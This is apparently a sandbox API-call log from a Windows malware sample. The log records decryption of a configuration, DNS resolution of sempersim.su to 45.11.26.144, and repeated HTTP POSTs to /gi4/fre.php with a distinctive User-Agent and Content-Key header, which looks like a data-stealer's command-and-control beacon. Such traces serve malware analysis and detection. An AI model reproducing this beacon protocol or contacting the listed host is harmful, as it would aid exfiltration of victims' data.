(lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0237.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0237.497] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0237.497] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0237.498] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0237.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0237.499] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0237.499] GetProcessHeap () returned 0x5b0000 [0237.499] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0237.499] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0237.500] GetProcessHeap () returned 0x5b0000 [0237.500] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0237.503] GetProcessHeap () returned 0x5b0000 [0237.503] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0237.503] GetProcessHeap () returned 0x5b0000 [0237.503] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2ff0 | out: hHeap=0x5b0000) returned 1 [0237.503] GetProcessHeap () returned 0x5b0000 [0237.503] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3590 [0237.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0237.505] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0237.511] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0237.512] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0237.521] GetProcessHeap () returned 0x5b0000 [0237.521] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0237.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0237.523] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0237.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0237.524] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0237.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0237.525] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0237.525] GetProcessHeap () returned 0x5b0000 [0237.525] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0237.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0237.526] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3590, pdwDataLen=0xdfcfc | out: pbData=0x5d3590, pdwDataLen=0xdfcfc) returned 1 [0237.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0237.527] CryptDestroyKey (hKey=0x5bde08) returned 1 [0237.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0237.528] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0237.528] GetProcessHeap () returned 0x5b0000 [0237.528] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5f88 [0237.529] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0237.529] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0237.530] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0237.530] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0237.531] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0237.533] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0237.534] GetProcessHeap () returned 0x5b0000 [0237.534] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0237.534] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cd9f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0237.536] GetProcessHeap () returned 0x5b0000 [0237.536] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa10 [0237.536] socket (af=2, type=1, protocol=6) returned 0x368 [0237.537] connect (s=0x368, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0237.607] FreeAddrInfoW (pAddrInfo=0x5cd9f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0237.607] GetProcessHeap () returned 0x5b0000 [0237.607] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5910 [0237.607] GetProcessHeap () returned 0x5b0000 [0237.607] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0237.607] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0237.608] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0237.608] GetProcessHeap () returned 0x5b0000 [0237.608] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0237.608] GetProcessHeap () returned 0x5b0000 [0237.609] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0237.609] GetProcessHeap () returned 0x5b0000 [0237.609] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3158 [0237.609] GetProcessHeap () returned 0x5b0000 [0237.609] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0237.610] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0237.610] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0237.610] GetProcessHeap () returned 0x5b0000 [0237.610] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0237.610] GetProcessHeap () returned 0x5b0000 [0237.611] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0237.611] send (s=0x368, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0237.611] send (s=0x368, buf=0x5d1e18*, len=159, flags=0) returned 159 [0237.611] GetProcessHeap () returned 0x5b0000 [0237.611] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0237.611] recv (in: s=0x368, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0238.798] GetProcessHeap () returned 0x5b0000 [0238.799] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0238.799] GetProcessHeap () returned 0x5b0000 [0238.799] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3158 | out: hHeap=0x5b0000) returned 1 [0238.799] GetProcessHeap () returned 0x5b0000 [0238.799] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0238.799] GetProcessHeap () returned 0x5b0000 [0238.800] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5910 | out: hHeap=0x5b0000) returned 1 [0238.800] closesocket (s=0x368) returned 0 [0238.801] GetProcessHeap () returned 0x5b0000 [0238.801] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa10 | out: hHeap=0x5b0000) returned 1 [0238.801] GetProcessHeap () returned 0x5b0000 [0238.801] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5f88 | out: hHeap=0x5b0000) returned 1 [0238.801] GetProcessHeap () returned 0x5b0000 [0238.801] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3590 | out: hHeap=0x5b0000) returned 1 [0238.801] GetProcessHeap () returned 0x5b0000 [0238.802] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0238.802] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xa10) returned 0x368 [0238.803] Sleep (dwMilliseconds=0xea60) [0238.823] GetProcessHeap () returned 0x5b0000 [0238.823] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3398 [0238.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0238.824] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0238.831] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0238.832] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0238.839] GetProcessHeap () returned 0x5b0000 [0238.839] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c86b0 [0238.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0238.841] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c86b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0238.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0238.842] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0238.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0238.842] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.842] GetProcessHeap () returned 0x5b0000 [0238.843] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c86b0 | out: hHeap=0x5b0000) returned 1 [0238.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0238.888] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3398, pdwDataLen=0xdfcfc | out: pbData=0x5d3398, pdwDataLen=0xdfcfc) returned 1 [0238.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0238.889] CryptDestroyKey (hKey=0x5bde08) returned 1 [0238.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0238.890] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0238.890] GetProcessHeap () returned 0x5b0000 [0238.890] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0238.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0238.891] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0238.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0238.892] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0238.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0238.892] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0238.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0238.893] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0238.893] GetProcessHeap () returned 0x5b0000 [0238.893] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0238.893] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0238.894] GetProcessHeap () returned 0x5b0000 [0238.894] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0238.894] GetProcessHeap () returned 0x5b0000 [0238.894] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0238.894] GetProcessHeap () returned 0x5b0000 [0238.895] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3398 | out: hHeap=0x5b0000) returned 1 [0238.895] GetProcessHeap () returned 0x5b0000 [0238.895] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d34b8 [0238.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0238.896] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0238.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0238.942] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0238.948] GetProcessHeap () returned 0x5b0000 [0238.948] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0238.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0238.949] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0238.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0238.950] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0238.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0238.951] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.951] GetProcessHeap () returned 0x5b0000 [0238.951] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0238.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0238.952] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d34b8, pdwDataLen=0xdfcfc | out: pbData=0x5d34b8, pdwDataLen=0xdfcfc) returned 1 [0238.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0238.955] CryptDestroyKey (hKey=0x5bde08) returned 1 [0238.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0238.956] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0238.956] GetProcessHeap () returned 0x5b0000 [0238.956] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5298 [0238.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0238.957] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0238.957] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0238.958] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0238.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0238.958] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0238.959] GetProcessHeap () returned 0x5b0000 [0238.959] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb1a0 [0238.959] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cde58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0238.960] GetProcessHeap () returned 0x5b0000 [0238.960] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa50 [0238.960] socket (af=2, type=1, protocol=6) returned 0x36c [0238.960] connect (s=0x36c, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0239.035] FreeAddrInfoW (pAddrInfo=0x5cde58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0239.035] GetProcessHeap () returned 0x5b0000 [0239.035] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0239.035] GetProcessHeap () returned 0x5b0000 [0239.035] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0239.035] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0239.036] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0239.036] GetProcessHeap () returned 0x5b0000 [0239.036] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0239.037] GetProcessHeap () returned 0x5b0000 [0239.037] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0239.037] GetProcessHeap () returned 0x5b0000 [0239.037] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3590 [0239.037] GetProcessHeap () returned 0x5b0000 [0239.037] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0239.038] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0239.039] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0239.039] GetProcessHeap () returned 0x5b0000 [0239.039] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0239.039] GetProcessHeap () returned 0x5b0000 [0239.040] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0239.040] send (s=0x36c, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0239.040] send (s=0x36c, buf=0x5d1e18*, len=159, flags=0) returned 159 [0239.040] GetProcessHeap () returned 0x5b0000 [0239.040] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0239.040] recv (in: s=0x36c, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0240.220] GetProcessHeap () returned 0x5b0000 [0240.221] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0240.221] GetProcessHeap () returned 0x5b0000 [0240.221] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3590 | out: hHeap=0x5b0000) returned 1 [0240.221] GetProcessHeap () returned 0x5b0000 [0240.221] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0240.221] GetProcessHeap () returned 0x5b0000 [0240.222] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0240.222] closesocket (s=0x36c) returned 0 [0240.222] GetProcessHeap () returned 0x5b0000 [0240.222] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa50 | out: hHeap=0x5b0000) returned 1 [0240.222] GetProcessHeap () returned 0x5b0000 [0240.223] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5298 | out: hHeap=0x5b0000) returned 1 [0240.223] GetProcessHeap () returned 0x5b0000 [0240.223] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d34b8 | out: hHeap=0x5b0000) returned 1 [0240.223] GetProcessHeap () returned 0x5b0000 [0240.223] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb1a0 | out: hHeap=0x5b0000) returned 1 [0240.224] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xb7c) returned 0x36c [0240.225] Sleep (dwMilliseconds=0xea60) [0240.234] GetProcessHeap () returned 0x5b0000 [0240.234] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3500 [0240.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0240.235] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0240.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0240.243] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0240.255] GetProcessHeap () returned 0x5b0000 [0240.255] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84d0 [0240.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0240.257] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c84d0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0240.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0240.258] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0240.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0240.260] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0240.260] GetProcessHeap () returned 0x5b0000 [0240.260] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84d0 | out: hHeap=0x5b0000) returned 1 [0240.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0240.262] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3500, pdwDataLen=0xdfcfc | out: pbData=0x5d3500, pdwDataLen=0xdfcfc) returned 1 [0240.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0240.264] CryptDestroyKey (hKey=0x5bde08) returned 1 [0240.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0240.268] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0240.268] GetProcessHeap () returned 0x5b0000 [0240.268] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0240.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0240.269] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0240.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0240.270] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0240.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0240.270] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", 